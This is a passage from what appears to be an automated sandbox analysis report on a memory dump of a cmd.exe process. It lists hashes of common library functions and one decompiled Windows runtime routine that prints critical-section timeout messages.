                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: de54b0bb1ab3c08cf17f51154705c64d5238f7750875355b030eaa09ec6e8fe5
                                                                                                                                          • Instruction ID: dca772b62dc012a911a14ad80512f6b863b22853c4f0dadb1b6e91c892d48247
                                                                                                                                          • Opcode Fuzzy Hash: de54b0bb1ab3c08cf17f51154705c64d5238f7750875355b030eaa09ec6e8fe5
                                                                                                                                          • Instruction Fuzzy Hash: 219002B120509D42D141B1594408A46151597E0355F71C011A416C694D97658D55B6A1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19660 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 10205bf2417a3998fea69fa422b64938162498c23feaf6f81ccf2f94b870d5f9
                                                                                                                                          • Instruction ID: 84aed2b6d100b24cf075235f054e71d28a6bbaf84e7db015ac76dbeecea95f15
                                                                                                                                          • Opcode Fuzzy Hash: 10205bf2417a3998fea69fa422b64938162498c23feaf6f81ccf2f94b870d5f9
                                                                                                                                          • Instruction Fuzzy Hash: BF9002B120105D02D181B159440864A150597E1351FB1C015A412D654DCB558A5977E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19610 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 9c4f9b2795bdf2ecd7924971a628d72c01f64a0d44c67655f0034b78ed642ba4
                                                                                                                                          • Instruction ID: 53808dd49306ba72b1920cc59c856b6c112d8c22306643a62947e94c224e6747
                                                                                                                                          • Opcode Fuzzy Hash: 9c4f9b2795bdf2ecd7924971a628d72c01f64a0d44c67655f0034b78ed642ba4
                                                                                                                                          • Instruction Fuzzy Hash: 8E9002B160505D02D151B1594418746150597E0351F71C011A412C654D87958A5576E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C195F0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: eba61b4c2557ce0e035ee5b70559ce717421229e2180f3ae6c83b7aa251d69e1
                                                                                                                                          • Instruction ID: 1bfd938b3628317758adf459799c4bff61bdfdc40b0c483bd1aead1e11a40cf6
                                                                                                                                          • Opcode Fuzzy Hash: eba61b4c2557ce0e035ee5b70559ce717421229e2180f3ae6c83b7aa251d69e1
                                                                                                                                          • Instruction Fuzzy Hash: 799002B120105D02D105A1594808686150597E0351F71C011AA12C655E97A588917171
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19560 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 35f6d36968f2ee9ecf483f2fe73002b54d50ca64ebab8ce89edffcee50c5f4b4
                                                                                                                                          • Instruction ID: 5785f04556294c7d3d64b21ec13d0b5e3d3e5a352ba54f842ff542e9b1c896ec
                                                                                                                                          • Opcode Fuzzy Hash: 35f6d36968f2ee9ecf483f2fe73002b54d50ca64ebab8ce89edffcee50c5f4b4
                                                                                                                                          • Instruction Fuzzy Hash: D79002A5221055020146E559060850B1945A7E63A13B1C015F551E590CC76188656361
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f4e86117481eaa5f0e2877ec3ed987297dc85cf9072658f6b3e5a86b67c0eb94
                                                                                                                                          • Instruction ID: eeef761eeb13a3b3081a668b843a770cbe69a2c0b384902f950ef0d4d4b7282a
                                                                                                                                          • Opcode Fuzzy Hash: f4e86117481eaa5f0e2877ec3ed987297dc85cf9072658f6b3e5a86b67c0eb94
                                                                                                                                          • Instruction Fuzzy Hash: C49002E1201195924501E2598408B0A5A0597F0251B71C016E515C560CC6658851A175
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C1AD30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 8369a1fa223c98241cf6f203a47753e9ec5a78a6faf1afbd53d23d407564249f
                                                                                                                                          • Instruction ID: abdcf230a3f4686f17bc1fbf1f1383620b5e8740603fe5b518853d5bd18b8679
                                                                                                                                          • Opcode Fuzzy Hash: 8369a1fa223c98241cf6f203a47753e9ec5a78a6faf1afbd53d23d407564249f
                                                                                                                                          • Instruction Fuzzy Hash: BB9002B1A05055129141B15948186465506A7F0791B75C011A461C554C8A948A5563E1
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C19670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                                          Download Yara Rule
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                          • Instruction ID: 07dda2b3e3f55b0dd419c567997c79699024ce8afb02812415d68a07eef81970
                                                                                                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Function 03C6FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                                                                          Download Yara Rule
                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                          			E03C6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E03C1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03C65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03C65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                                                                          0x03c6fdda
                                                                                                                                          0x03c6fde2
                                                                                                                                          0x03c6fde5
                                                                                                                                          0x03c6fdec
                                                                                                                                          0x03c6fdfa
                                                                                                                                          0x03c6fdff
                                                                                                                                          0x03c6fe0a
                                                                                                                                          0x03c6fe0f
                                                                                                                                          0x03c6fe17
                                                                                                                                          0x03c6fe1e
                                                                                                                                          0x03c6fe19
                                                                                                                                          0x03c6fe19
                                                                                                                                          0x03c6fe19
                                                                                                                                          0x03c6fe20
                                                                                                                                          0x03c6fe21
                                                                                                                                          0x03c6fe22
                                                                                                                                          0x03c6fe25
                                                                                                                                          0x03c6fe40

                                                                                                                                          APIs
                                                                                                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03C6FDFA
                                                                                                                                          Strings
                                                                                                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03C6FE2B
                                                                                                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03C6FE01
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: true
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_5_2_3bb0000_cmd.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                                                                          • API String ID: 885266447-3903918235
                                                                                                                                          • Opcode ID: e1626602e9d59b871d3961b9f849a552b80a87772eb9f0b0338803de6bd49644
                                                                                                                                          • Instruction ID: 468193010fe1649491e035d07fc46c416245e17e419de559a57646c9b077ae60
                                                                                                                                          • Opcode Fuzzy Hash: e1626602e9d59b871d3961b9f849a552b80a87772eb9f0b0338803de6bd49644
                                                                                                                                          • Instruction Fuzzy Hash: F6F0F636244641BFDB349A45DC42F27BF5AEB45730F254318F628DA5E1DA62F830A6F0
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%